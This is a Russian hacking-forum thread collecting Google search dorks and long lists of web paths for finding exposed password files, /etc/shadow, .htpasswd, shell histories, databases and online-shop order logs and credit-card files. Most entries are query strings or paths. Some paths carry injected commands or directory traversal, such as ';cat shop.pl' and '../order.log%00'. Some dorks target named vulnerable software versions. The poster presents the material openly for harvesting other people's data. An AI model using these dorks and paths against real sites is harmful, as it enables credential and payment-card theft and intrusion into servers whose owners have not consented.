Форум АНТИЧАТ - Мега Сбор по Гугл Хакингу

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Мега Сбор по Гугл Хакингу (https://forum.antichat.xyz/showthread.php?t=47962)

Мега Сбор по Гугл Хакингу

Кажись не совсем статья а запросы в гугл, с помощью которых можно вытащить стока всякого хлама, что вам и не снилось.(думаю вы знаете как это использовать, т.к об этом было несколько поверхносных постов)
Ну собственно поехали

Цитата:

allinurl: "proxylist.txt"
allinurl: "proxy.txt"
"index of/root"
"auth_user_file.txt"
"index of/root"
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype oc
allintitle: restricted filetype :mail
allintitle: restricted filetype oc site:gov
for IIS server exlpoit
allinurl: winnt/system32/
and u’ll get many IIS server exploitsъ
intitle:r57shell
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
inurl:/adpassword.txt
inurl:admin.dat
and even for shop sites:
inurl:/shop/db/
intitle:"index of/ shop" +db
intitle:"index of/" +shopping_cart

Цитата:

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurlasswd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."

top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

Многие админы оставляют открытыми такие директории:

Цитата:

/orders
/Order
/Orders
/order
/config
/Admin_files
/mall_log_files
/PDG_Cart
PDG_Cart/order.log
PDG_Cart/shopper.conf
/pw
/store/customers
/store/temp_customers
/WebShop
/webshop
/WebShop/templates
/WebShop/logs
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt

в
этих директориях мы за частую можем найти такие файлы как

Цитата:

orders.txt
order.txt
import.txt
checks.txt
order_log
order.log
orders.log
orders_log
log_order
log_orders
temp_order
temp_orders
order_temp
robots.txt
admin.mdb
user_file.txt

и т .д и т.п

Замечу, это далеко не всё.
И даже из этого можно вытянуть уйму всего.
Фантазируем :)

Хм...наткнулся на одну сцылку может одно и тоже имхо есть оттуда чё добавить:

Код:

http://gray-world.net/etc/passwd/googletut1.txt

молодец что все вместе собрал ) пригодиться )

Не в обиду, но вот именно что:

Цитата:

можно вытащить стока всякого хлама

.. действительно что то интересное, поднять едва ли получится. За старания плюс ;)

хех можно в сторону бекапов, дампов и прочих там users.sql покопать

Код:

comment:advisories and vulnerabilities*-----

"1999-2004 FuseTalk Inc" -site:fusetalk.com

"2003 DUware All Rights Reserved"

"Active Webcam Page" inurl:8080

"BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"

"BosDates Calendar System " "powered by BosDates v3.2 by BosDev"

"Copyright © 2002 Agustin Dondo Scripts"

"delete entries" inurl:admin/delete.asp

"driven by: ASP Message Board"

"Enter ip" inurl:"php-ping.php"

"IceWarp Web Mail 5.3.0" "Powered by IceWarp"

"Ideal BB Version: 0.1" -idealbb.com

"inurl:/site/articles.asp?idcategory="

"Obtenez votre forum Aztek" -site:forum-aztek.com

"Online Store - Powered by ProductCart"

"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")

"Powered by A-CART"

"Powered by AJ-Fork v.167"

"powered by antiboard"

"Powered by Coppermine Photo Gallery"

"Powered by CubeCart"

"Powered by DCP-Portal v5.5"

"Powered by DMXReady Site Chassis Manager" -site:dmxready.com

"Powered by FUDforum"

"Powered by Gallery v1.4.4"

"Powered by IceWarp Software" inurl:mail

"Powered by Ikonboard 3.1.1"

"Powered by Megabook *" inurl:guestbook.cgi

"Powered by MercuryBoard [v1"

"powered by minibb" -site:www.minibb.net -intext:1.7f

"Powered by My Blog" intext:"FuzzyMonkey.org"

"Powered by ocPortal" -demo -ocportal.com

"powered by phpWebSite" 0.9-3-2...4

"Powered by PowerPortal v1.3"

"powered by vbulletin 3.0"

"Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq

"Powered by WowBB" -site:wowbb.com

"Powered by YaPig V0.92b"

"Powered by yappa-ng"

"running: Nucleus v3.1" -.nucleuscms.org -demo

"SquirrelMail version 1.4.4" inurl:src ext:php

"This page has been automatically generated by Plesk Server Administrator"

+"Powered by Invision Power Board v2.0.0..2"

+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl

inurl:"dispatch.php?atknodetype" | inurl:class.at -----Achievo webbased project management-----

allintitle:aspjar.com guestbook

inurl:"/becommunity/community/index.php?pageurl=" -----E-market remote code execution-----

inurl:custva.asp -----EarlyImpact Productcart-----

ext:php intext:"Powered by phpNewMan Version"

ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input

filetype:cgi inurl:nbmember.cgi

filetype:cgi inurl:pdesk.cgi

filetype:cgi inurl:tseekdir.cgi

filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)

intext:("UBB.threads™ 6.2"|"UBB.threads™ 6.3") intext:"You * not logged *" -site:ubbcentral.com

intitle:"EMUMAIL - Login" "Powered by EMU Webmail"

intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)

intitle:"View Img" inurl:viewimg.php

intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse

intitle:"WordPress > * > Login form" inurl:"wp-login.php"

intitle:guestbook "advanced guestbook 2.2 powered"

intitle:welcome.to.horde

inurl:"/cgi-bin/loadpage.cgi?user_id="

inurl:"/site/articles.asp?idcategory="

inurl:"comment.php?serendipity"

inurl:"messageboard/Forum.asp?"

inurl:"slxweb.dll"

inurl:/SiteChassisManager/

inurl:cal_make.pl

inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

inurl:comersus_message.asp

inurl:directorypro.cgi

inurl:gotoURL.asp?url=

inurl:technote inurl:main.cgi*filename=*

inurl:ttt-webmaster.php

inurl:wiki/MediaWiki

"Powered by Invision Power Board(U) v1.3 Final" -----Invision Power Board SSI.PHP SQL Injection-----

"Powered by mnoGoSearch - free web search engine software" -----nGoSearch vulnerability-----

"FC Bigfeet" -inurl:mail -----Quicksite demopages for Typo3-----

inurl:com_remository -----ReMOSitory module for Mambo-----

uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album

"Powered by: vBulletin * 3.0.1" inurl:newreply.php -----vBulletin version 3.0.1 newreply.php XSS-----

filetype:asp inurl:"shopdisplayproducts.asp" -----VP-ASP Shopping Cart XSS-----

inurl:/cgi-bin/index.cgi inurl:topics inurl:viewcat= +intext:"WebAPP" -site:web-app.org -----WebAPP directory traversal-----

"FrontPage-" inurl:service.pwd

" Dumping data for table" 

"phpMyAdmin MySQL-Dump" filetype:txt

"1999-2004 FuseTalk Inc" -site:fusetalk.com

"4images Administration Control Panel"

"ASP.NET_SessionId" "data source="

"Active Webcam Page" inurl:8080

"AnWeb/1.42h" intitle:index.of

"BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"

"CERN httpd 3.0B (VAX VMS)"

"Certificate Practice Statement" inurl:(PDF | DOC)

"Copyright (c) Tektronix, Inc." "printer status"

"Enter ip" inurl:"php-ping.php"

"FC Bigfeet" -inurl:mail 

"File Upload Manager v1.3" "rename to"

"HTTP_FROM=googlebot" googlebot.com "Server_Software="

"IMail Server Web Messaging" intitle:login

"Ideal BB Version: 0.1" -idealbb.com

"Incorrect syntax near"

"Index of /backup"

"Index of" rar r01 nfo Modified 2004

"Internal Server Error" "server at"

"JRun Web Server" intitle:index.of

"Login to Usermin" inurl:20000

"MaXX/3.1" intitle:index.of

"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log

"Microsoft-IIS/* server at" intitle:index.of

"Microsoft-IIS/5.0 server at"

"More Info about MetaCart Free"

"Netware * Home" inurl:nav.html

"Network Vulnerability Assessment Report"

"OPENSRS Domain Management" inurl:manage.cgi

"ORA-00933: SQL command not properly ended"

"ORA-12541: TNS:no listener" intitle:"error occurred"

"OmniHTTPd/2.10" intitle:index.of

"OpenSA/1.0.4" intitle:index.of

"Phaser 6250" "Printer Neighborhood" "XEROX CORPORATION" 

"Phaser® 740 Color Printer" "printer named: "

"Phorum Admin" "Database Connection" inurl:forum inurl:admin

"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")

"Powered by A-CART"

"Powered by Coppermine Photo Gallery"

"Powered by DCP-Portal v5.5"

"Powered by Duclassified" -site:duware.com

"Powered by Dudirectory" -site:duware.com

"Powered by Gallery v1.4.4"

"Powered by Ikonboard 3.1.1"

"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )

"Powered by Link Department"

"Powered by MercuryBoard [v1"

"Powered by PHPFM" filetype:php -username 

"Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq

"Powered by YaPig V0.92b"

"Powered by ocPortal" -demo -ocportal.com

"Powered by yappa-ng"

"Red Hat Secure/2.0"

"Request Details" "Control Tree" "Server Variables"

"Select a database to view" intitle:"filemaker pro"

"SquirrelMail version 1.4.4" inurl:src ext:php

"Supplied argument is not a valid MySQL result resource"

"Switch to table format" inurl:table|plain

"SysCP - login"

"The script whose uid is " "is not allowed to access"

"This file was generated by Nessus"

"This page has been automatically generated by Plesk Server Administrator"

"This report was generated by WebLog"

"Unclosed quotation mark before the character string"

"VNC Desktop" inurl:5800

"Warning: Cannot modify header information - headers already sent"

"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"

allinurl:/examples/jsp/snp/snoop.jsp

allinurl:index.htm?cus?audio

allinurl:install/install.php

allinurl:intranet admin

allinurl:servlet/SnoopServlet

axis storpoint "file view" inurl:/volumes/

buddylist.blt

camera linksys inurl:main.cgi

comment:Files containing juicy info***]

comment:Files containing usernames

comment:Pages containing login portals

comment:Sensitive Directories***]

comment:Various online devices

comment:Vulnerable servers

comment:advisories and vulnerabilities

data filetype:mdb -site:gov -site:mil

databasetype. Code : 80004005. Error Description 

e-mail address filetype:csv csv

eggdrop filetype:user user

etc (index.of)

ext:asp inurl:DUgallery intitle:"3.0" -site:dugallery.com -site:duware.com

ext:asp inurl:pathto.asp

ext:cgi intext:"nrg-" " This web page was created on "

ext:cgi inurl:editcgi.cgi inurl:file=

ext:cgi inurl:ubb6_test.cgi

ext:conf inurl:rsyncd.conf -cvs -man

ext:gho gho

ext:ini eudora.ini

ext:ini intext:env.ini

ext:ldif ldif

ext:log "Software: Microsoft Internet Information Services *.*"

ext:mdb inurl:*.mdb  inurl:fpdb shop.mdb

ext:nsf nsf -gov -mil

ext:php intext:"Powered by phpNewMan Version"

ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input

ext:reg "username=*" putty

ext:txt inurl:dxdiag

ext:vmx vmx

ezBOO "Administrator Panel" -cvs

filetype:QDF QDF

filetype:asp "Custom Error Message" Category Source

filetype:asp DBQ=" * Server.MapPath("*.mdb")

PHP код:


		
			
1. "Index of /admin"

2. "Index of /password"

3. "Index of /mail"

4. "Index of /" +passwd

5. "Index of /" +password.txt

6. "Index of /" +.htaccess

7. index of ftp +.mdb allinurl:/cgi-bin/ +mailto

8. administrators.pwd.index

9. authors.pwd.index

10. service.pwd.index

11. filetype:config web

12. gobal.asax index

13. allintitle: "index of/admin"

14. allintitle: "index of/root"

15. allintitle: sensitive filetype:doc

16. allintitle: restricted filetype :mail

17. allintitle: restricted filetype:doc site:gov

18. inurlasswd filetype:txt

19. inurl:admin filetype:db

20. inurl:iisadmin

21. inurl:"auth_user_file.txt"

22. inurl:"wwwroot/*."

23. top secret site:mil

24. confidential site:mil

25. allinurl: winnt/system32/ (get cmd.exe)

26. allinurl:/bash_history

27. intitle:"Index of" .sh_history

28. intitle:"Index of" .bash_history

29. intitle:"index of" passwd

30. intitle:"index of" people.lst

31. intitle:"index of" pwd.db

32. intitle:"index of" etc/shadow

33. intitle:"index of" spwd

34. intitle:"index of" master.passwd

35. intitle:"index of" htpasswd

36. intitle:"index of" members OR accounts

37. intitle:"index of" user_carts OR user_cart

38. ALTERNATIVE INPUTS====================

39. _vti_inf.html

40. service.pwd

41. users.pwd

42. authors.pwd

43. administrators.pwd

44. shtml.dll

45. shtml.exe

46. fpcount.exe

47. default.asp

48. showcode.asp

49. sendmail.cfm

50. getFile.cfm

51. imagemap.exe

52. test.bat

53. msadcs.dll

54. htimage.exe

55. counter.exe

56. browser.inc

57. hello.bat

58. default.aspdvwssr.dll

59. cart32.exe

60. add.exe

61. index.jsp

62. SessionServlet

63. shtml.dll

64. index.cfm

65. page.cfm

66. shtml.exe

67. web_store.cgi

68. shop.cgi

69. upload.asp

70. default.asp

71. pbserver.dll

72. phf

73. test-cgi

74. finger

75. Count.cgi

76. jj

77. php.cgi

78. php

79. nph-test-cgi

80. handler

81. webdist.cgi

82. webgais

83. websendmail

84. faxsurvey

85. htmlscript

86. perl.exe

87. wwwboard.pl

88. www-sql

89. view-source

90. campas

91. aglimpse

92. glimpse

93. man.sh

94. AT-admin.cgi

95. AT-generate.cgi

96. filemail.pl

97. maillist.pl

98. info2www

99. files.pl

100. bnbform.cgi

101. survey.cgi

102. classifieds.cgi

103. wrap

104. cgiwrap

105. edit.pl

106. perl

107. names.nsf

108. webgais

109. dumpenv.pl

110. test.cgi

111. submit.cgi

112. guestbook.cgi

113. guestbook.pl

114. cachemgr.cgi

115. responder.cgi

116. perlshop.cgi

117. query

118. w3-msql

119. plusmail

120. htsearch

121. infosrch.cgi

122. publisher

123. ultraboard.cgi

124. db.cgi

125. formmail.cgi

126. allmanage.pl

127. ssi

128. adpassword.txt

129. redirect.cgi

130. cvsweb.cgi

131. login.jsp

132. dbconnect.inc

133. admin

134. htgrep

135. wais.pl

136. amadmin.pl

137. subscribe.pl

138. news.cgi

139. auctionweaver.pl

140. .htpasswd

141. acid_main.php

142. access.log

143. log.htm

144. log.html

145. log.txt

146. logfile

147. logfile.htm

148. logfile.html

149. logfile.txt

150. logger.html

151. stat.htm

152. stats.htm

153. stats.html

154. stats.txt

155. webaccess.htm

156. wwwstats.html

157. source.asp

158. perl

159. mailto.cgi

160. YaBB.pl

161. mailform.pl

162. cached_feed.cgi

163. global.cgi

164. Search.pl

165. build.cgi

166. common.php

167. show

168. global.inc

169. ad.cgi

170. WSFTP.LOG

171. index.html~

172. index.php~

173. index.html.bak

174. index.php.bak

175. print.cgi

176. register.cgi

177. webdriver

178. bbs_forum.cgi

179. mysql.class

180. sendmail.inc

181. CrazyWWWBoard.cgi

182. search.pl

183. way-board.cgi

184. webpage.cgi

185. pwd.dat

186. adcycle

187. post-query

188. help.cgi

189. /robots.txt

190. /admin.mdb

191. /shopping.mdb

192. /arg;

193. /stats/styles.css

194. /statshelp.htm

195. /favicon.ico

196. /stats/admin.mdb

197. /shopdbtest.asp

198. /cgi-bin/test.cgi

199. /cgi-bin/test.pl

200. /cgi-bin/env.cgi

201. /photos/protest/styles.css

202. http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi

203. /cgi-bin/whereami.cgi

204. /shopping400.mdb

205. /cgi/test.cgi

206. /cgi-bin/test2.pl

207. /photos/protest/kingmarch_02.html

208. /chevy/index.htm

209. /cgi-bin/glocation.cgi

210. /cgi-bin/test2.cgi

211. /ccbill/glocation.cgi

212. /cgi-bin/styles.css

213. /shopping350.mdb

214. /cgi-bin/shopper.cgi

215. /shopadmin.asp

216. /news_2003-02-27.htm

217. /cgi-bin/whois.cgi

218. 3 /cgi-bin/calendar.pl

219. 3 /cgi-bin/calendar/calendar.pl

220. 3 /cgibin/styles.css

221. 3 /venem.htm

222. 2 /stats/www.newbauersflowers.com/stats/04-refers.htm

223. 2 /cgi-bin/where.pl

224. 2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG

225. 2 /cgibin/recon.cgi

226. 2 /cgibin/test.cgi

227. 2 /WebShop/templates/styles.css

228. 2 /stats/shopping350.mdb

229. 2 /cgi-bin/mailform.cgi

230. 2 /cgi-bin/recon.cgi

231. 2 /chevy

232. 2 /cgi-bin/servinfo.cgi

233. 2 /acart2_0.mdb

234. 2 /cgi-bin/where.cgi

235. 2 /chevy/

236. 2 /stats/www.savethemall.net/stats/19-refers.htm

237. 2 /ccbill/secure/ccbill.log

238. 2 /cgi/recon.cgi

239. 2 /stats/www.gregoryflynn.com/chevy

240. 2 /ibill/glocation.cgi

241. 2 /ccbill/whereami.cgi

242. 2 /ibill/whereami.cgi

243. 2 /apps_trial.htm

244. 2 /cgi-bin/lancelot/recon.cgi

245. 2 /cgi-bin/DCShop/Orders/styles.css

246. 1 /cgi-bin/htmanage.cgi

247. 1 /stats/www.tysons.net/stats/05-refers.htm

248. 1 /cgi-bin/mastergate/add.cgi

249. 1 /cgi-bin/openjournal.cgi

250. 1 /cgi-bin/calendar/calendar_admin.pl

251. 1 /cgibin/ibill/count.cgi

252. 1 /cgi-bin/nbmember2.cgi

253. 1 /cgi-bin/mastergate/count.cgi

254. 1 /cgi-bin/mastergate/accountcreate.cgi

255. 1 /cgi-bin/ibill/accountcreate.cgi

256. 1 /cgibin/MasterGate2/count.cgi

257. 1 /cgi-bin/amadmin.pl

258. 1 /cgibin/mailform.cgi

259. 1 /cgibin/mastergate/count.cgi

260. 1 /cgibin/harvestor.cgi

261. 1 /cgibin/igate/count.cgi

262. 1 /WebShop

263. 1 /shopdisplaycategories.asp

264. 1 /cgi-bin/DCShop/Orders/orders.txt

265. 1 /cgi-bill/revshare/joinpage.cgi

266. 1 /stats/www.gregoryflynn.com/stats/19-refers.htm

267. 1 /cgi-local/DCShop/auth_data/styles.css

268. 1 /cgi-bin/add-passwd.cgi

269. 1 /cgi-bin/MasterGate/count.cgi

270. 1 /apps_shop.htm%20/comersus/database/comersus.mdb

271. 1 /data/verotellog.txt

272. 1 /epwd/ws_ftp.log

273. 1 /stats/www.dialacure.com/stats/16-refers.htm

274. 1 /cgi/MasterGate2/count.cgi

275. 1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019

276. 1 /wwii/styles.css

277. 1 /cgi-bin/admin.mdb

278. 1 /stats/www.gregoryflynn.com/stats/31-refers.htm

279. 1 /cgi-bin/ibill-tools/count.cgi

280. 1 /WebShop/templates/cc.txt

281. 1 /cgibin/ibill/accountcreate.cgi

282. 1 /cgi-bin/count.cgi

283. 1 /cgi-local/DCShop/auth_data/auth_user_file.txt

284. 1 /cgi/mastergate/count.cgi

285. 1 /cgi-bin/EuroDebit/addusr.pl

286. 1 /cgi-bin/dbm-passwd.cgi

287. 1 /cgi/igate/accountcreate.cgi

288. 1 /cgi-bin/store/Log_files/your_order.log

289. store/log_files/your_order.log

290. /cgi-bin/DCShop/Orders/orders.txt

291. /vpasp/shopdbtest.asp

292. /orders/checks.txt

293. /WebShop/logs

294. /ccbill/secure/ccbill.log

295. /scripts/cart32.exe

296. /cvv2.txt

297. /cart/shopdbtest.asp

298. /cgi-win/cart.pl

299. /shopdbtest.asp

300. /WebShop/logs/cc.txt

301. /cgi-local/cart.pl

302. /PDG_Cart/order.log

303. /config/datasources/expire.mdb

304. /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html

305. /orders/orders.txt

306. /cgis/cart.pl

307. /webcart/carts

308. /cgi-bin/cart32.exe/cart32clientlist

309. /cgi/cart.pl

310. /comersus/database/comersus.mdb

311. /WebShop/templates/cc.txt

312. /Admin_files/order.log

313. /orders/mountain.cfg

314. /cgi-sys/cart.pl

315. /scripts/cart.pl

316. /htbin/cart.pl

317. /productcart/database/EIPC.mdb

318. /shoponline/fpdb/shop.mdb

319. /config/datasources/myorder.mdb

320. /PDG_Cart/shopper.conf

321. /shopping/database/metacart.mdb

322. /bin/cart.pl

323. /cgi-bin/cart32.ini

324. /database/comersus.mdb

325. /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt

326. /cgi-bin/store/Admin_files/myorderlog.txt

327. /cgi-bin/orders.txt

328. /cgi-bin/store/Admin_files/your_order.log

329. /test/test.txt

330. /fpdb/shop.mdb

331. /cgibin/shop/orders/orders.txt

332. /shopadmin1.asp

333. /cgi-bin/shop.cgi

334. /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

335. /cgi-bin/PDG_cart/card.txt

336. /shopper.cgi?preadd=action&key=PROFA&template=order1.log

337. /store/shopdbtest.asp

338. /log_files/your_order.log

339. /_database/expire.mdb

340. /HyperStat/stat_what.log

341. /cgibin/DCShop/auth_data/auth_user_file.txt

342. /htbin/orders/orders.txt

343. /SHOP/shopadmin.asp

344. /index.cgi?page=../admin/files/order.log

345. /vpshop/shopadmin.asp

346. /webcart/config

347. /PDG/order.txt

348. /cgi-bin/shopper.cgi

349. /orders/order.log

350. /orders/db/zzzbizorders.log.html

351. /easylog/easylog.html

352. /cgi-bin/store/Log_files/your_order.log

353. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb

354. /comersus_message.asp?

355. /orders/import.txt

356. /htbin/DCShop/auth_data/auth_user_file.txt

357. /admin/html_lib.pl

358. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt

359. /cgi-bin/DCShop/auth_data/auth_user_file.txt

360. /cgi-bin/shop.pl/page=;cat%20shop.pl

361. /cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log

362. /HBill/htpasswd

363. /bin/shop/auth_data/auth_user_file.txt

364. /cgi-bin/cs/shopdbtest.asp

365. /mysql/shopping.mdb

366. /Catalog/config/datasources/Products.mdb

367. /trafficlog

368. /cgi/orders/orders.txt

369. /cgi-local/PDG_Cart/shopper.conf

370. /store/cgi-bin/Admin_files/expire.mdb

371. /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log

372. /derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log

373. /cgi-bin/mc.txt

374. /cgi-bin/mall2000.cgi

375. /cgi-win/DCShop/auth_data/auth_user_file.txt

376. /cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log

377. /store/commerce.cgi

378. /scripts/shop/orders/orders.txt

379. /product/shopping350.mdb

380. /super_stats/access_logs

381. /cgi-local/orders/orders.txt

382. /cgi-bin/PDG_Cart/mc.txt

383. /cgibin/cart32.exe

384. /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log

385. /cgibin/password.txt

386. /Catalog/cart/carttrial.dat

387. /catalog/Admin/Admin.asp

388. /ecommerce/admin/user/admin.asp

389. /data/productcart/database/EIPC.mdb

390. /store/admin_files/commerce_user_lib.pl

391. /cgi-bin/store/index.cgi

392. /paynet.txt

393. /config/datasources/store/billing.mdb

394. /_database/shopping350.mdb

395. /cgi-bin/shopper.exe?search

396. /cgi/shop.pl/page=;cat%20shop.pl

397. /cgi-bin/store/Admin_files/orders.txt

398. /cgi-bin/store/commerce_user_lib.pl

399. /cgi-sys/pagelog.cgi

400. /cgi-sys/shop.pl/page=;cat%20shop.pl

